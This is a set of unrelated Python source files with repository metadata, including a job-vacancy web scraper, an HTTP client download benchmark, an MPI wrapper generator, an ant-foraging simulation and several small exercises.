def get_html_string(self, url, headers='', params=''):
try:
response = requests.get(url, headers=headers, params=params)
if response.ok:
return response.text
except Exception as e:
sleep(1)
print(e)
return None
@staticmethod
def get_dom(html_string):
return bs(html_string, "html.parser")
def run(self):
next_butten_hh = ''
while next_butten_hh != None:
if next_butten_hh == '':
html_string = self.get_html_string(self.start_url + '/search/vacancy', self.start_headers, self.start_params)
else:
html_string = self.get_html_string(next_butten_hh)
soup = HHscraper.get_dom(html_string)
vacance_list = soup.findAll('div', attrs={'class': 'vacancy-serp-item'})
self.get_info_from_element(vacance_list)
try:
next_butten_hh = self.start_url + soup.find('a', attrs={'data-qa': 'pager-next'}).attrs["href"]
except Exception as e:
next_butten_hh = None
def get_info_from_element(self, vacance_list):
for vacance in vacance_list:
vacance_data = {}
vacance_name = vacance.find('a', {'class': 'bloko-link'}).getText()
vacance_city = vacance.find('div', {'data-qa': 'vacancy-serp__vacancy-address'}).getText()
vacance_link = vacance.find('a', {'class': 'bloko-link'}).attrs["href"]
vacance_data['имя вакансии'] = vacance_name
vacance_data['город'] = vacance_city
vacance_data['ссылка на вакансию'] = vacance_link
vacance_data['источник'] = self.start_url
self.get_salary(vacance_data, vacance)
self.info_vacance.append(vacance_data)
def get_salary(self, vacance_data, vacance):
try:
vacance_salary = vacance.find('span', {'data-qa': 'vacancy-serp__vacancy-compensation'}).getText()
vacance_salary = vacance_salary.replace('\u202f', '').split()
if '–' in vacance_salary:
vacance_data['мин зарплата'] = float(vacance_salary[0])
vacance_data['макс зарплата'] = float(vacance_salary[2])
vacance_data['валюта'] = vacance_salary[-1]
elif 'от' in vacance_salary:
vacance_data['мин зарплата'] = float(vacance_salary[1])
vacance_data['валюта'] = vacance_salary[-1]
elif 'до' in vacance_salary:
vacance_data['макс зарплата'] = float(vacance_salary[1])
vacance_data['валюта'] = vacance_salary[-1]
except Exception as e:
vacance_data['зарплата'] = None
def save_info_vacance(self):
with open("vacancy_hh.json", 'w', encoding="utf-8") as file:
json.dump(self.info_vacance, file, indent=2, ensure_ascii=False)
class SJscraper:
def __init__(self, start_url, headers, params):
self.start_url = start_url
self.start_headers = headers
self.start_params = params
self.info_sj_vacance = []
def get_html_string(self, url, headers='', params=''):
try:
response = requests.get(url, headers=headers, params=params)
if response.ok:
return response.text
except Exception as e:
sleep(1)
print(e)
return None
@staticmethod
def get_dom(html_string):
return bs(html_string, "html.parser")
def run(self):
next_butten_sj = ''
while next_butten_sj != None:
if next_butten_sj == '':
html_string = self.get_html_string(self.start_url + "vacancy/search/", self.start_headers,
self.start_params)
else:
html_string = self.get_html_string(next_butten_sj)
soup = SJscraper.get_dom(html_string)
vacance_list = soup.findAll('div', attrs={'class': 'Fo44F QiY08 LvoDO'})
self.get_info_from_element(vacance_list)
try:
next_butten_sj = main_link_sj + soup.find('a', attrs={'class': 'f-test-button-dalshe'}).attrs["href"]
except Exception as e:
next_butten_sj = None
def get_info_from_element(self, vacance_list):
for vacancy in vacance_list:
vacancy_sj_data = {}
vacancy_sj_name = vacancy.find('a', {'class': 'icMQ_'}).getText()
# vacance_sj_city = vacancy.find('span', {'class': 'f-test-text-company-item-location _2LcRC _1_rZy dXrZh Ml4Nx'}).getText()
vacancy_sj_link = main_link_sj + vacancy.find('a', {'class': 'icMQ_'}).attrs["href"]
vacancy_sj_data['имя вакансии'] = vacancy_sj_name
# vacance_sj_city['город'] = vacance_sj_city
vacancy_sj_data['ссылка на вакансию'] = vacancy_sj_link
vacancy_sj_data['источник'] = self.start_url
self.get_salary(vacancy_sj_data, vacancy)
self.info_sj_vacance.append(vacancy_sj_data)
def get_salary(self, vacancy_sj_data, vacancy):
try:
vacancy_sj_salary = vacancy.find("span",
{'class': "_1OuF_ _1qw9T f-test-text-company-item-salary"}).getText()
if '—' in vacancy_sj_salary:
sal = vacancy_sj_salary.replace('\xa0', ' ').split()
if sal[0].isdigit() and sal[1].isdigit():
mim_sal = sal[0] + sal[1]
vacancy_sj_data['мин зарплата'] = float(mim_sal)
else:
vacancy_sj_data['мин зарплата'] = float(sal[0])
if sal[-3].isdigit() and sal[-2].isdigit():
max_sal = sal[-3] + sal[-2]
vacancy_sj_data['макс зарплата'] = float(max_sal)
else:
vacancy_sj_data['макс зарплата'] = float(sal[-3])
vacancy_sj_data['валюта'] = sal[-1]
elif 'По' in vacancy_sj_salary:
vacancy_sj_data['зарплата'] = "По договоренности"
vacancy_sj_data['валюта'] = None
elif 'от' in vacancy_sj_salary:
sal = vacancy_sj_salary.replace('\xa0', ' ').split()
if sal[1].isdigit() and sal[2].isdigit():
mim_sal = sal[1] + sal[2]
vacancy_sj_data['мин зарплата'] = float(mim_sal)
else:
vacancy_sj_data['мин зарплата'] = float(sal[1])
vacancy_sj_data['валюта'] = sal[-1]
elif 'до' in vacancy_sj_salary:
sal = vacancy_sj_salary.replace('\xa0', ' ').split()
if sal[1].isdigit() and sal[2].isdigit():
max_sal = sal[1] + sal[2]
vacancy_sj_data['макс зарплата'] = float(max_sal)
else:
vacancy_sj_data['макс зарплата'] = float(sal[1])
vacancy_sj_data['валюта'] = sal[-1]
else:
sal = vacancy_sj_salary.replace('\xa0', ' ').split()
if sal[0].isdigit() and sal[1].isdigit():
user_sal = sal[0] + sal[1]
vacancy_sj_data['макс зарплата'] = float(user_sal)
except:
vacancy_sj_data['зарплата'] = None
def save_info_vacance(self):
with open("vacancy_sj.json", 'w', encoding="utf-8") as file:
json.dump(self.info_sj_vacance, file, indent=2, ensure_ascii=False)
if __name__ == '__main__':
    user_find = input('Enter the job title to search for: ')
#user_find = 'python'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"}
main_link_hh = "https://hh.ru"
params_main_hh = {"area": "1",
"fromSearchLine": "true",
"st": "searchVacancy",
"text": user_find,
"page": "0"}
scraper_hh = HHscraper(main_link_hh, headers, params_main_hh)
scraper_hh.run()
scraper_hh.save_info_vacance()
main_link_sj = "https://www.superjob.ru/"
params_sj = {"keywords": user_find,
"geo[t][0]": "4"}
scraper_sj = SJscraper(main_link_sj, headers, params_sj)
scraper_sj.run()
scraper_sj.save_info_vacance()
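    # Note (added): running this script writes two files to the working
    # directory, vacancy_hh.json and vacancy_sj.json, each containing a JSON
    # list of the vacancy dictionaries assembled above.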
|
XYI7I/GeekBrains
|
AI/Method_collecting_Internet_data/Lesson2/lesson2.py
|
lesson2.py
|
py
| 10,254 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
21998861864
|
n=int(input())
arr=list(map(int,input().split()))
sof=0
sos=0
for i in range(n):
if(i<n//2):
sof+=arr[i]
else:
sos+=arr[i]
print(abs(sof-sos))
|
Lavanya18901/codemind-python
|
difference_between_sum_of_first_half_and_second_half_in_an_array.py
|
difference_between_sum_of_first_half_and_second_half_in_an_array.py
|
py
| 158 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71484733948
|
def is_finish(x, y):
return x == 4
l = list(range(4))
cnt = 0
a = set(range(10))
assert(len(a & set(l)) == 4)
print(*l)
cnt += 1
X, Y = map(int, input().split())
if is_finish(X, Y):
exit(0)
for i in range(4):
not_in = a - set(l)
for n in not_in:
tmpl = l[:]
tmpl[i] = n
assert(len(a & set(tmpl)) == 4)
print(*tmpl)
cnt += 1
assert(cnt <= 100)
tmpx, tmpy = map(int, input().split())
if is_finish(tmpx, tmpy):
exit(0)
if tmpx > X:
l = tmpl[:]
X, Y = tmpx, tmpy
break
elif tmpx < X:
break
else:
for j in range(i+1, 4):
tmpl = l[:]
tmpl[i], tmpl[j] = tmpl[j], tmpl[i]
assert(len(a & set(tmpl)) == 4)
print(*tmpl)
cnt += 1
assert(cnt <= 100)
tmpx, tmpy = map(int, input().split())
if is_finish(tmpx, tmpy):
exit(0)
if tmpx > X:
l = tmpl[:]
X, Y = tmpx, tmpy
break
else:
assert(0)
|
knuu/competitive-programming
|
yukicoder/yuki355.py
|
yuki355.py
|
py
| 1,137 |
python
|
en
|
code
| 1 |
github-code
|
6
|
31356164054
|
import os
import argparse
import re
import textwrap
default_mpi_function_list = [
"int MPI_Init(int *argc, char ***argv)",
"int MPI_Finalize(void)",
"int MPI_Comm_rank(MPI_Comm comm, int *rank)",
"int MPI_Comm_size(MPI_Comm comm, int *size)",
"int MPI_Send(const void *buf, int count, MPI_Datatype datatype, int dest, int tag, MPI_Comm comm)",
"int MPI_Recv(void *buf, int count, MPI_Datatype datatype, int source, int tag, MPI_Comm comm, MPI_Status *status)"
]
def extract_between(text, sub1, sub2, nth=1):
"""
extract a substring from text between two given substrings
sub1 (nth occurrence) and sub2 (nth occurrence)
arguments are case sensitive
"""
# prevent sub2 from being ignored if it's not there
if sub2 not in text.split(sub1, nth)[-1]:
return None
return text.split(sub1, nth)[-1].split(sub2, nth)[0]
def get_args_list(args_name, args_type, args_post):
d = {}
d["pargs"] = ""
d["args"] = ""
for idy,function_name in enumerate(args_name):
d["pargs"] += args_type[idy]
d["pargs"] += " "
d["pargs"] += args_name[idy]
d["pargs"] += args_post[idy]
d["pargs"] += ", "
d["args"] += args_name[idy]
d["args"] += ", "
if(len((d["pargs"])) > 0):
if(d["pargs"][-2] == ','):
d["pargs"] = d["pargs"][:-2]
if(d["args"][-2] == ','):
d["args"] = d["args"][:-2]
return d
def get_ret_list(rtype):
d = {}
dec_ret_val = ""
get_ret_val = ""
ret_ret_val = "return"
if(rtype != "void"):
dec_ret_val += rtype + " val = ("+rtype+") 0;"
get_ret_val += "val = "
ret_ret_val += " val"
ret_ret_val += ";"
d["dec"] = dec_ret_val
d["get"] = get_ret_val
d["ret"] = ret_ret_val
return d
def parse_mpi_functions(mpi_functions_list):
d={}
d["name"] = []
d["type"] = []
d["args"] = {}
d["args"]["type"] = []
d["args"]["name"] = []
d["args"]["post"] = []
for function in mpi_functions_list:
d["name"] += [function.split()[1].split('(')[0]]
d["type"] += [function.split()[0]]
args_list = extract_between(function, '(', ')')
name_list = []
type_list = []
post_list = []
tmp = ""
for mpi_args in args_list.split(','):
mpi_arg = mpi_args.split()
if(len(mpi_arg) > 1):
tmp_idx = mpi_arg[-1].strip('*').find("[")
if(tmp_idx < 0):
tmp_idx = len(mpi_arg[-1].strip('*'))
name_list += [mpi_arg[-1].strip('*')[0:tmp_idx]]
tmp = mpi_arg[0]
if(tmp == "const"):
tmp += " " + mpi_arg[1]
for idx in range(0,mpi_args.count('*')):
tmp += ' *'
type_list += [tmp]
if("[" in mpi_arg[-1]):
post_list += ["[]"]
else:
post_list += [""]
d["args"]["name"] += [name_list]
d["args"]["type"] += [type_list]
d["args"]["post"] += [post_list]
return d
def get_mpi_proto_list(d):
l = []
for idx,function in enumerate(d["name"]):
proto = d["type"][idx]+" "+d["name"][idx]+"("
for idy,function_name in enumerate(d["args"]["name"][idx]):
proto += d["args"]["type"][idx][idy]
proto += " "
proto += d["args"]["name"][idx][idy]
proto += d["args"]["post"][idx][idy]
proto += ", "
if(proto[-2] == ','):
proto = proto[:-2]
proto += ")"
l += [proto]
return l
def print_selfie_h_header():
s = ""
s += '''#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <cstring>
#include <execinfo.h>
#include <dlfcn.h>
#include <cstdarg>
#include <fenv.h>
#pragma STDC FENV_ACCESS ON
typedef void (*function_type)(...);
'''
return s
def print_selfie_h_footer():
s = ""
s += '''
}
'''
return s
def print_selfie_h_n_mpi(d, plugin_name):
s = '''
/// \\brief Total number of {1} functions
#define N_{1}_FUNCTIONS {0}
'''.format(str(len(d["name"])), plugin_name.upper())
return s
def print_selfie_h_get_name(d,plugin_name):
s = ""
s +='''/// \\brief Return a string containing name of functions
/// \\param[in] i Index
/// \\return Return a string containing name of functions
///
char *selfie_get_{0}_function_name(int i)
{{
char const *{0}_functions_name[] = {{
'''.format(plugin_name)
for name in d["name"]:
s += ''' "{0}",\n'''.format(name)
for name in d["name"]:
s += ''' "P{0}",\n'''.format(name)
s += ''' NULL
}};
return strdup({0}_functions_name[i]);
}};
'''.format(plugin_name)
return s
def print_selfie_h_builtin_function(idx, name, symbol, rtype, plugin_name):
d_ret = get_ret_list(rtype)
s = '''
#ifdef __SELFIE_MPI_BUILTIN__
/// \\brief {1}
///
/// \\param ...
/// \\return {3}
///
/// \details
///
{3} {1}(...)
{{
double f_start = 0.0;
function_type selfie_function = NULL;
int ap_except = 0;
selfie_function = selfie_{4}_pointer_functions[{0}];
if(selfie_function == NULL)
{{
selfie_function = (function_type) dlsym(RTLD_NEXT,"{2}");
}}
selfie_{4}_global_data[{0}].function_count++;
f_start = selfie_mysecond();
ap_except = fedisableexcept(FE_INVALID);
void* ret = __builtin_apply(selfie_function,
__builtin_apply_args(), 1024);
feclearexcept(FE_INVALID);
feenableexcept(ap_except);
selfie_{4}_global_data[{0}].function_time += selfie_mysecond() - f_start;
__builtin_return(ret);
}};
#endif
'''.format(idx, name, symbol, rtype, plugin_name)
return s
def print_selfie_h_functions(d,plugin_name):
s = ""
for idx,name in enumerate(d["name"]):
s += print_selfie_h_builtin_function(idx, name, name,
d["type"][idx], plugin_name)
s += print_selfie_h_builtin_function(idx,
"P"+name, name, d["type"][idx],
plugin_name)
return s
def print_selfie_h_global_array(d,plugin_name):
s = '''
/// \\brief Array of pointers of functions
function_type selfie_{1}_orig_pointer_functions[{0}] = {{NULL}};
/// \\brief Array of pointers of functions
function_type *selfie_{1}_pointer_functions = selfie_{1}_orig_pointer_functions;
'''.format(len(d["name"]),plugin_name)
return s
def print_selfie_h(d,pname):
s = ""
s += print_selfie_h_header()
s += print_selfie_h_n_mpi(d, pname)
s += print_selfie_h_get_name(d, pname)
s += print_selfie_h_global_array(d, pname)
s += "\nextern \"C\" {\n\n"
s += print_selfie_h_functions(d, pname)
s += print_selfie_h_footer()
return s
def read_inputfile(inputfile):
function_list = []
with open(inputfile,"r") as fdi:
for line in fdi:
if (len(line) > 1):
function_list += [line[:-1]]
return function_list
def main():
parser = argparse.ArgumentParser(
description="Generate list of MPI functions")
parser.add_argument("-p","--proto",action="store_true",
default=False,
help="Print list of MPI functions prototypes")
parser.add_argument("-i","--input",action="store",
default=None,
help="File containing MPI functions list")
parser.add_argument("-n","--name",action="store",
default="mpi",
help="Name of plugin")
parser.add_argument("-o","--output",action="store",
default=None,
help="File where to print "+
"result (If None, print to stdout)")
args = parser.parse_args()
print("")
print(parser.description)
print("")
header = True
# Print proto or not
if(args.proto == True):
header = False
# Input file
if(args.input != None):
mpi_function_list = read_inputfile(args.input)
else:
mpi_function_list = default_mpi_function_list
# Output file
if(args.output != None):
outfile = args.output
else:
outfile = None
pname = args.name
# Parse functions
d = parse_mpi_functions(mpi_function_list)
# Print prototypes
if(header == False):
if(outfile == None):
for proto_name in get_mpi_proto_list(d):
print(proto_name)
else:
with open(outfile,"w") as fd:
for proto_name in get_mpi_proto_list(d):
fd.write(proto_name)
print("File "+outfile+" written")
# Print header
else:
if(outfile == None):
print(print_selfie_h(d,pname))
else:
with open(outfile,"w") as fd:
fd.write(print_selfie_h(d,pname))
print("File "+outfile+" written")
if __name__ == "__main__": main()
|
cea-hpc/selFIe
|
src/parse_mpi.py
|
parse_mpi.py
|
py
| 9,164 |
python
|
en
|
code
| 16 |
github-code
|
6
|
18798291843
|
import matplotlib.pyplot as plt
import random
import numpy as np
from IPython.display import display, clear_output
import time
def head_home(x, y):
"""
Head home down and to the left.
Parameters
----------
    x : int
        Horizontal coordinate.
    y : int
        Vertical coordinate.
    Returns
    -------
    x : int
        Updated horizontal coordinate.
    y : int
        Updated vertical coordinate.
"""
pick = np.zeros(x + y)
pick[0:x] = 1
if (np.random.choice(pick) == 1):
x -= 1
else:
y -= 1
if (x < 0):
x = 0
if (y < 0):
y = 0
return x, y
def search_for_food(x, y, smell):
"""
Search for food by following the smell.
Parameters
----------
    x : int
        Horizontal coordinate.
    y : int
        Vertical coordinate.
    smell : numpy.ndarray
        2D array of smell intensities.
    Returns
    -------
    x : int
        Updated horizontal coordinate.
    y : int
Updated vertical coordinate.
"""
directions = ['up', 'left', 'down', 'right']
x_dim = smell.shape[0]
y_dim = smell.shape[1]
# First check to see if there is food up and to the right.
g = [] # follow gradient
m = []
if (x + 1 < x_dim):
if (smell[x + 1, y] > 0):
m.append(smell[x + 1, y])
g.append('right')
if (y + 1 < y_dim):
if (smell[x, y + 1] > 0):
m.append(smell[x, y + 1])
g.append('up')
if (g != []):
grad = g[m.index(max(m))]
# print("Following smell", grad)
else:
# else just pick a random direction.
grad = random.choice(directions)
# print("Choosing ",grad)
# move the ant
if (grad == 'up'):
y = y + 1
elif (grad == 'right'):
x = x + 1
elif (grad == 'down'):
y = y - 1
elif (grad == 'left'):
x = x - 1
else:
print(grad)
print("ERROR!!!!!!!!!!!!")
# make sure we don't go off the gird.
if (x < 0):
x = 0
if (y < 0):
y = 0
if (x > x_dim - 1):
x = x_dim - 1
if (y > y_dim - 1):
y = y_dim - 1
return x, y
def run(num_ants=100, x_dim=70, y_dim=30):
"""
Run the simulation
Parameters
----------
num_ants : int
        Initial number of ants to simulate. Default = 100
x_dim : int
Horizontal dimension of the board. Default = 70
y_dim : int
Vertical dimension of the board. Default = 30
"""
smell = np.zeros((x_dim, y_dim))
food = np.zeros((x_dim, y_dim))
# place food
food[45:50, 25:30] = 10
food[45:50, 25:30] = 10
food[65:70, 0:5] = 10
x_loc = np.random.randint(0, x_dim, size=(num_ants, 1))
y_loc = np.random.randint(0, y_dim, size=(num_ants, 1))
ant_loc = np.concatenate((x_loc, y_loc), axis=1)
has_food = np.zeros((num_ants, 1))
fig, ax = plt.subplots(figsize=(10, 5))
# Main simulation loop
for i in range(0, 100):
# Loop over ants
for a in range(0, num_ants):
x = ant_loc[a, 0]
y = ant_loc[a, 1]
if (x == 0 and y == 0):
has_food[a] = 0
if has_food[a] > 0:
x, y = head_home(x, y)
smell[x, y] = smell[x, y] + 100
else:
x, y = search_for_food(x, y, smell)
if food[x, y] > 0:
food[x, y] -= 1
has_food[a] = 1
ant_loc[a, 0] = x
ant_loc[a, 1] = y
smell = smell - 1
smell[smell < 0] = 0
# plot world
plt.imshow(food.T, origin='lower', aspect='equal', cmap="magma")
for a in range(0, num_ants):
color = 'r'
if (has_food[a] > 0):
color = 'g'
plt.scatter(ant_loc[a, 0], ant_loc[a, 1], color=color)
        # Animation part (doesn't change)
clear_output(wait=True) # Clear output for dynamic display
display(fig) # Reset display
fig.clear() # Prevent overlapping and layered plots
time.sleep(0.0001) # Sleep for a fraction of a second to allow animation to catch up
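# Minimal usage sketch (parameter values are only an example): calling
# run(num_ants=50, x_dim=70, y_dim=30) from a Jupyter notebook animates the
# simulation, since the display/clear_output calls above rely on IPython.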
|
msu-cmse-courses/cmse202-F22-data
|
code_samples/ant_function.py
|
ant_function.py
|
py
| 4,304 |
python
|
en
|
code
| 1 |
github-code
|
6
|
14868890436
|
from django.views.generic.base import TemplateView
from albums.forms import FileForm
from albums.models import Album, File
from core.decorators import view_decorator
from core.views import ResourceView
class AlbumPage(TemplateView):
template_name = "albums/main.html"
def expose(view):
view.expose = True
return view
@view_decorator(expose)
class AlbumView(ResourceView):
model = Album
@view_decorator(expose)
class FileView(ResourceView):
create_form = FileForm
model = File
|
qrees/backbone-gallery
|
albums/views.py
|
views.py
|
py
| 508 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20156935479
|
from flask import request
def validate_id(id):
# if not found in params
if (id is None):
raise TypeError("Request params (id) not found")
# if description params is empty
if not id:
raise ValueError("id is empty")
# if not integer
if not isinstance(id, int):
raise TypeError("id is not integer")
def validate_latitude(latitude):
# if not found in params
if (latitude is None):
raise TypeError("Request params (latitude) not found")
# if not float
if not isinstance(latitude, float):
raise TypeError("latitude is not float")
def validate_longtitude(longtitude):
# if not found in params
if (longtitude is None):
raise TypeError("Request params (longtitude) not found")
# if not float
if not isinstance(longtitude, float):
raise TypeError("longtitude is not float")
def point_read_contract(request):
id = request.args.get('id', type=int)
validate_id(id)
return {
'id': int(id)
}
def point_create_contract(request):
latitude = request.args.get('latitude', type=float)
longtitude = request.args.get('longtitude', type=float)
validate_latitude(latitude)
validate_longtitude(longtitude)
return {
'latitude': float(latitude),
'longtitude': float(longtitude)
}
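# Hypothetical usage inside a Flask view (route name and error handling are
# assumptions, not part of this module):
#   from flask import Flask, jsonify
#   app = Flask(__name__)
#   @app.route('/point', methods=['GET'])
#   def read_point():
#       try:
#           params = point_read_contract(request)
#       except (TypeError, ValueError) as error:
#           return jsonify({'error': str(error)}), 400
#       return jsonify(params), 200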
|
adriangohjw/cz2006-software-engineering
|
contracts/point_contracts.py
|
point_contracts.py
|
py
| 1,360 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38815716976
|
import argparse
import asyncio
import csv
import functools
import gc
import hashlib
import http.client
import importlib
import io
import math
import platform
import re
import socket
import statistics
import sys
import textwrap
import time
import urllib.parse
from typing import Callable, Awaitable, Tuple, Iterable, Optional
_Method = Callable[[str], bytes]
_AMethod = Callable[[str], Awaitable[bytes]]
METHODS = {}
CHECKSUMS = {
10**6 + 128: 'fa82243e0db587af04504f5d3229ff7227f574f8f938edaad8be8e168bc2bc87',
10**7 + 128: '128ceaac08362426bb7271ed6202d11c6830587a415bd7868359725c22d2fe88',
10**9 + 128: 'd699e2c306b897609be6222315366b25137778e18f8634c75b006cef50647978'
}
def method(name: str, requires: Iterable[str] = ()) -> Callable[[_Method], _Method]:
def decorate(func: _Method) -> _Method:
for mod in requires:
try:
importlib.import_module(mod)
except ImportError:
return func
METHODS[name] = func
return func
return decorate
def run_async(func: _AMethod) -> _Method:
@functools.wraps(func)
def wrapper(url: str) -> bytes:
loop = asyncio.new_event_loop()
try:
asyncio.set_event_loop(loop)
return loop.run_until_complete(func(url))
finally:
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
return wrapper
@method('httpclient')
def load_httpclient(url: str) -> bytes:
parts = urllib.parse.urlparse(url)
conn = http.client.HTTPConnection(parts.netloc)
conn.request('GET', parts.path)
resp = conn.getresponse()
return resp.read(resp.length) # type: ignore
@method('httpclient-na')
def load_httpclient_na(url: str) -> bytes:
parts = urllib.parse.urlparse(url)
conn = http.client.HTTPConnection(parts.netloc)
conn.request('GET', parts.path)
resp = conn.getresponse()
return resp.read()
@method('requests', ['requests'])
def load_requests(url: str) -> bytes:
import requests
return requests.get(url).content
@method('requests-c1M', ['requests'])
def load_requests_c1M(url: str) -> bytes:
import requests
old_chunk = requests.models.CONTENT_CHUNK_SIZE
try:
requests.models.CONTENT_CHUNK_SIZE = 1024 * 1024
return requests.get(url).content
finally:
requests.models.CONTENT_CHUNK_SIZE = old_chunk
@method('requests-stream', ['requests'])
def load_requests_stream(url: str) -> bytes:
import requests
with requests.get(url, stream=True) as resp:
return resp.raw.read()
@method('requests-stream-fp-read', ['requests'])
def load_requests_stream_fp_read(url: str) -> bytes:
import requests
with requests.get(url, stream=True) as resp:
return resp.raw._fp.read()
@method('requests-np', ['requests', 'numpy'])
def load_requests_np(url: str) -> bytes:
import requests
import numpy as np
with requests.get(url, stream=True) as resp:
data = np.empty(int(resp.headers['Content-length']), np.uint8)
resp.raw.readinto(memoryview(data))
return data
@method('requests-np-fp', ['requests', 'numpy'])
def load_requests_np_fp(url: str) -> bytes:  # renamed so it no longer shadows load_requests_np above
    import requests
    import numpy as np
    with requests.get(url, stream=True) as resp:
        data = np.empty(int(resp.headers['Content-length']), np.uint8)
        resp.raw._fp.readinto(memoryview(data))
        return data
@method('urllib3', ['urllib3'])
def load_urllib3(url: str) -> bytes:
import urllib3
return urllib3.PoolManager().request('GET', url).data
@method('tornado', ['tornado'])
@run_async
async def load_tornado(url: str) -> bytes:
import tornado.simple_httpclient
client = tornado.simple_httpclient.SimpleAsyncHTTPClient(max_body_size=10**10)
response = await client.fetch(url)
return response.body
@method('aiohttp', ['aiohttp'])
@run_async
async def load_aiohttp(url: str) -> bytes:
import aiohttp
async with aiohttp.ClientSession() as session:
async with session.get(url) as resp:
return await resp.read()
@method('httpx', ['httpx'])
def load_httpx(url: str) -> bytes:
import httpx
return httpx.get(url).content
@method('httpx-async', ['httpx'])
@run_async
async def load_httpx_async(url: str) -> bytes:
import httpx
async with httpx.AsyncClient() as client:
r = await client.get(url)
return r.content
def prepare_socket(url: str) -> Tuple[io.BufferedIOBase, int]:
parts = urllib.parse.urlparse(url)
address = (parts.hostname, parts.port)
sock = socket.socket()
sock.connect(address)
req_header = textwrap.dedent(f'''\
GET {parts.path} HTTP/1.1
Host: {parts.hostname}:{parts.port}
User-Agent: python
Connection: close
Accept: */*
''').replace('\n', '\r\n').encode('ascii')
fh = sock.makefile('rwb')
fh.write(req_header)
fh.flush()
content_length: Optional[int] = None
while True:
line = fh.readline()
if line == b'\r\n':
if content_length is None:
raise RuntimeError('Did not receive Content-Length header')
return fh, content_length # type: ignore
else:
text = line.decode('latin-1').rstrip().lower()
if text.startswith('content-length: '):
content_length = int(text.split(' ')[1])
@method('socket-read')
def load_socket_read(url: str) -> bytes:
fh, content_length = prepare_socket(url)
return fh.read(content_length)
@method('socket-readinto')
def load_socket_readinto(url: str) -> bytes:
fh, content_length = prepare_socket(url)
raw = bytearray(content_length)
n = fh.readinto(raw)
assert n == content_length
return memoryview(raw)[:n]
def validate(data: bytes):
size = len(data)
try:
checksum = CHECKSUMS[size]
except KeyError:
print('No checksum found')
else:
actual_checksum = hashlib.sha256(data).hexdigest()
if actual_checksum != checksum:
print(f'Checksum mismatch ({actual_checksum} != {checksum})')
def measure_method(method: str, args: argparse.Namespace) -> Tuple[float, float, int]:
# Warmup pass
METHODS[method](args.url)
rates = []
size = 0
for i in range(args.passes):
gc.collect()
start = time.monotonic()
data = METHODS[method](args.url)
stop = time.monotonic()
elapsed = stop - start
rates.append(len(data) / elapsed)
if i == 0:
validate(data)
size = len(data)
del data
mean = statistics.mean(rates)
std = statistics.stdev(rates) / math.sqrt(args.passes - 1)
return mean, std, size
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--passes', type=int, default=5)
parser.add_argument('--csv', action='store_true')
parser.add_argument('method')
parser.add_argument('url')
args = parser.parse_args()
if args.method not in METHODS and args.method != 'all':
parser.error('Method must be "all" or one of {}'.format(set(METHODS.keys())))
if args.csv:
writer = csv.DictWriter(sys.stdout, ['Python', 'Method', 'Size', 'mean', 'std'])
writer.writeheader()
match = re.search(r'PyPy \S+', sys.version)
if match:
version = match.group(0)
else:
version = platform.python_version()
if args.method == 'all':
methods = METHODS
else:
methods = [args.method]
for method in methods:
mean, std, size = measure_method(method, args)
if args.csv:
writer.writerow(
{
'Python': version,
'Method': method,
'Size': size,
'mean': mean,
'std': std
}
)
else:
print('{}: {:.1f} ± {:.1f} MB/s'.format(method, mean / 1e6, std / 1e6))
if __name__ == '__main__':
main()
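# Example invocations (host and path are placeholders, not from this repo):
#   python httpbench.py requests http://localhost:8000/payload.bin
#   python httpbench.py --passes 5 --csv all http://localhost:8000/payload.bin
# Passing "all" benchmarks every registered method; otherwise give one name
# from METHODS (e.g. httpclient, requests-stream, socket-readinto).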
|
ska-sa/pyconza2020-httpbench
|
httpbench.py
|
httpbench.py
|
py
| 8,026 |
python
|
en
|
code
| 4 |
github-code
|
6
|
25073375848
|
import math
def f(a: float, b: float, c: float) -> float:
    if a == 0:
        raise Exception("a cannot be zero")
    if b*b < 4*a*c:
        raise Exception("Those values give a complex result")
    try:
        d = (-b + math.sqrt(b*b - 4*a*c))/(2*a)
    except Exception:
        print("There is an error")
        raise  # re-raise so we never fall through to an undefined d
    return d
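# Worked example (values chosen for this note, not from the original script):
# f(1, 3, -4) computes (-3 + sqrt(9 + 16)) / 2 = (-3 + 5) / 2 = 1.0, so
# print(f(1, 3, -4)) would output 1.0. The call below uses a = 0 and therefore
# raises the "a cannot be zero" exception instead of printing a root.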
a=0
b=3
c=-3
print(f(a,b,c))
|
Gohan2021/ProgAplicada
|
tarea_2023_0227.py
|
tarea_2023_0227.py
|
py
| 313 |
python
|
es
|
code
| 0 |
github-code
|
6
|
10819469391
|
import numpy as np
import argparse
import imutils
import cv2
ap = argparse.ArgumentParser()
ap.add_argument("-i","--image",required = True, help="Path of Image File")
args = vars(ap.parse_args())
#image = cv2.imread("image.png")
print("Path: ", args["image"])
image = cv2.imread(args["image"])
# find all the 'black' shapes in the image
upper = np.array([15,15,15])
lower = np.array([0,0,0])
shapeMask = cv2.inRange(image,lower,upper)
# find the contours in the mask
cnts = cv2.findContours(shapeMask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
print("Found {} black shapes".format(len(cnts)))
cv2.imshow("Mask", shapeMask)
# loop over the contours
for c in cnts:
# draw the contour and show it
cv2.drawContours(image, [c], -1, (0, 255, 0), 2)
cv2.imshow("Image", image)
cv2.waitKey(0)
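# Rough usage sketch (the image path is an example):
#   python shape.py --image image.png
# The script masks pixels in the [0,0,0]-[15,15,15] range, reports how many
# external contours it found, and outlines each detected shape in green.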
|
Pallavi04/ComputerVision
|
FindShapes/shape.py
|
shape.py
|
py
| 837 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27022143594
|
from pymongo import MongoClient
import pprint
from urllib.request import urlopen
from bs4 import BeautifulSoup
class Data_extraction_creation:
def __init__(self):
self.source=""
self.search=""
self.search_length=0
def getting_source(self):
#client=MongoClient("mongodb://127.0.0.1:27017")
#database=client['testing']
self.file_name=input("Enter the name of the text file to read the source code :\n")
self.file_name = self.file_name + ".txt"
self.file_open=open(self.file_name, 'r')
self.file2=self.file_open.read()
        # keep the markup as a plain string (with an explicit parser) so the
        # index-based slicing below and the string concatenation keep working
        self.file = str(BeautifulSoup(self.file2, "html.parser"))
        print(self.file + "\n\n")
